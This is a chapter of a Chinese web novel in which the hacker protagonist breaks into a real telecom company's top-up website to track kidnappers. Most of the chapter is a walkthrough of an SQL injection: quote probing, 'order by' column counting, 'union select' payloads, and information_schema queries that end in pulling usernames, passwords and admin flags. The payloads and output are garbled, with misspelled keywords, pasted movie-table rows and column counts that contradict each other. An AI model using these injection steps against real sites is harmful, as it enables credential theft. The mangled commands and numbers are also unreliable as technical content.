别人治国他养鹿，雇佣兵的小宝贝_第32章 “德州电锯杀人狂”藏身养猪场，网络黑客追凶主持正义

王涛是网络安全专业的毕业生。

首先想到的就是利用网络查询。

通过路口的监控摄像头确定绑匪的活动轨迹。

墨西哥城警务系统采用的是Telcel电信公司的数据网络。

入侵Telcel机房，内网渗透，目录遍历。

找到监控摄像头数据。

王涛离开酒店。

在没有监控的街角，买了20部Telcel的预充值手机。

回到酒店。

打开自己的笔记本电脑。

启动VMware Workstation虚拟机。

查询到Telcel官方网站。

点击页面的充值链接。

登录采用的是短信验证功能。

在登录界面输入’。

页面提示 “near '%'' at line 1”。

充值数据库存在注入漏洞。

查询数据库的字段。

’order by 12# 显示Error: Unknown column '12' in 'order clause'

第12行没有漏洞。

继续测试。

’order by 11# 显示Error: Unknown column '11' in 'order clause'

第11行也没有漏洞。

继续测试到第9行的时候发现了漏洞。

' order by 7 #

Tile Relese Chaacter Gere qwas

World War Z Gery Lne horr asxz

The Drk Kight Ries Buce Wyne action asxz

The Amazing Spider-Man Peter Paker action asxz

The Inredible Hulk Brce Banner acton asxz

The Fst ad the Furious Brian O'Connor actin asxz

Iron Mn Toy Strk actin asxz

Ma of Stel Clrk Ket acion asxz

G.I. Je: Retlition Cora Commnder acton asxz

Termnator Salation Jhn Conor si-fi asxz

6个字段

继续查询可显示的字段数。

-1' union select 1,2,3,4,5,6,7 #

Tile Relase Carater Gere Ib

2 3 5 4 Lnk

2，3，4，5 为可显示字段

爆破数据库。

1' unon seect 1,daabse,3,4,5,6,7 #

Tile Reease Chaacter Gnre IMb

3 2 3 5 4 Lik 没有爆出数据库

1' unon selet 1,dtabase,3,4,5,6,7 #

Ttle Relse Chracer Gre IMb

qwas 3 5 4 Lik

库名：qwas

爆破数据库的关键内容。

-1' unon selct 1,colmn_nme,3,4,5,6,7 fom infrmation_shema.colums whee tble_scema=dataase nd tale_nme='usrs'#

Tile Relese Chaacter Gere IDb

id 1 2 6 Lik

password 1 2 6 Lik

Eail 1 2 6 Lik

seret 1 2 6 Lik

actiatio_code 1 2 6 Lik

actvated 1 2 6 Lik

admin 1 2 6 Lik

一共8个字段，确定 login,admin,password

查询字段内容。

-1' union select 1,login,password,4,admin,6,7 from qwas .users#